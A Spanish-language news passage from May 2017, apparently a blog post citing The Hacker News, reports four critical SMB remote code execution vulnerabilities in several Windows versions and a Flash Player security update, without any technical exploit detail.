Además, se han descubierto otras cuatro vulnerabilidades críticas de ejecución de código en remoto, las cuales afectaban al protocolo de compartición por red SMB en Windows 7, 8.1, Server 2008, Server 2012 y Server 2016: CVE-2017-0272, CVE-2017-0277, CVE-2017-0278 y CVE-2017-0279. Dichas vulnerabilidades ponían a PC y servidores Windows en riesgo de ser hackeados en caso de usar SMBv1, aunque no hay noticias de que hayan sido explotadas.

Adobe Flash Player también ha recibido su correspondiente actualización de seguridad para los sistemas operativos Windows, macOS y Linux.

Fuente: The Hacker News

por Eduardo Medina Fri, 12 May 2017 15:29:13 +0000